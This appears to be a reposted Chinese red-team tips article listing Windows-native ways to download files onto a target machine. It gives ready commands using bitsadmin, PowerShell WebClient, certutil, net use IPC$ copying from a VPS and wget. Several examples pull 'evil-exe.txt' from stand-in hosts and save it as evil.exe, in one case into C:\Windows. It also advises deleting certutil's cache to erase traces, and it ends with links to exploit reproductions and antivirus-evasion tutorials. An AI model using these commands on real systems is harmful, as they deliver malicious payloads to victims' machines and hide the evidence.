【分享 | 红队TIPS】Windows远程下载文件方法汇总(建议收藏)
2022-7-28 17:58:5 Author: 渗透Xiao白帽(查看原文) 阅读量:43 收藏

核心思想为不能使用要求过高, 最好是windows原生就有的, 或是使用非常方便的才记录在此

使用方法: bitsadmin /transfer n '下载地址' '保存地址'例子-下载在某个地方 bitsadmin /transfer n http://baidu.com/evil-exe.txt C:\Users\miao\Desktop\evil.exe 
下载完毕以后 C:\Users\miao\Desktop\ 就会出现个 evil.exe
使用方法: powershell (new-object System.Net.WebClient).DownloadFile('下载地址',['保存地址'])
例子-下载在某个地方: powershell (new-object System.Net.WebClient).DownloadFile('http://test.com/evil-exe.txt','C:\evil.exe') 

下载完毕以后 C盘 根目录就会出现个 evil.exe
例子-下载在当前路径: 
powershell (new-object System.Net.WebClient).DownloadFile('http://test.com/evil-exe.txt','evil.exe')
下载完毕以后, 当前程序执行的路径在哪里文件就会保存在哪里
例如现在程序执行的路径是 C:\Users\ 那么下载的文件就会保存在 C:\Users\ 这个目录下面

注意: 由于使用certutil下载文件会留下缓存,所以下载完文件以后强烈建议在删除对应的缓存

缓存目录地址: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
使用方法: 
下载文件: certutil -urlcache -split -f '下载地址' ['保存地址'] 删除缓存: certutil -urlcache -split -f '下载地址' delete
例子-下载在当前路径: 
下载文件: certutil -urlcache -split -f http://test.com/evil-exe.txt evil.exe 删除缓存: certutil -urlcache -split -f http://test.com/evil-exe.txt delete
例子-下载在某个地方: 下载文件: certutil -urlcache -split -f http://test.com/evil-exe.txt C:\Users\evil.exe 删除缓存: certutil -urlcache -split -f http://test.com/evil-exe.txt delete
使用方法: # 建立远程IPC连接 net use \\'vps-ip'\ipc$ /user:'账号' '密码' 
# 复制远程文件到本地主机 copy \\'vps-ip'\'盘符'$\'下载地址' '保存地址'
windows-vps-环境 ip:220.181.38.***账号:administrator 密码:****
现在这台vpsC:\Users\有个user.txt内容为test
例子-通过外网vps下载文件在本机当前路径 
# 建立远程IPC连接 net use \\220.181.38.***\ipc$ /user:administrator ****
# 复制远程文件到本地主机 # 复制远程vps主机的文件到本机的当前路径下,执行成功以后,本机的当前路径就会出现一个test.txt文件 # 例如本机当前路径为:C:\Users\Administrator\Desktop # 那么执行完下面这个命令以后就会在这个路径生成一个test.txt文件
copy \\220.181.38.***\c$\Users\test.txt
例子-通过外网vps下载文件在本机某个目录下 
# 建立远程IPC连接 net use \\220.181.38.***\ipc$ /user:administrator ****

# 复制远程文件到本地主机 # 复制远程vps主机的文件到本机的C:\Windows\目录文件名叫test.exe copy \\220.181.38.***\c$\Users\test.txt C:\Windows\test.exe

注:这个方法不是通用的,很多情况需要我们在目标机器上面下载个东西

wget这个有点骚,很多情况下需要我们自己上传个exe,不是很符合本文章,所以要看情况使用 windows2006会自带wget命令, 所以如果是windows2006那就不用上传wget.exe文件 
直接使用 wget -O '保存地址' '下载地址' 下载文件 即可

如果有上传权限可以在目标机器上面上传个免安装的wget.exe执行程序到目标机器, 然后我们在下载文件

(注: 比较脑残我也不懂为什么有上传权限还要上传个wget.exe进行远程下载,但是指不定有人需要)

wget下载地址:https://eternallybored.org/misc/wget/

这里我也提供下载好的, 方便直接下载, zip文件里面有两个文件wget-64.exe与wget-32.exe请按自己实战需求使用

使用方法: wget-64.exe -O '保存地址' '下载地址'
例子-下载在当前路径: wget-64.exe -O "evil.exe" http://test.com/evil-exe.txt
例子-下载在某个地方: wget-64.exe wget -O "C:\Users\evil.exe" http://baidu.com/evil-exe.txt

文章来源:白帽兔

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细 | 钟馗之眼】ZoomEye-python命令行的使用

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

  记一次HW实战笔记 | 艰难的提权爬坑

【漏洞速递+检测脚本 | CVE-2021-49104】泛微E-Office任意文件上传漏洞

免杀基础教学(上卷)

免杀基础教学(下卷)

走过路过的大佬们留个关注再走呗

往期文章有彩蛋哦


一如既往的学习,一如既往的整理,一如即往的分享

如侵权请私聊公众号删文

推荐阅读↓↓↓

我知道你在看


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247493504&idx=1&sn=73beb072acb27c2a0b6f8603112bc235&chksm=ea3418dadd4391ccba6c75954d6c31be26bde9e51f4e9cb1bf8c2416eb9fd1d8d20dda36f25c#rd
如有侵权请联系:admin#unsafe.sh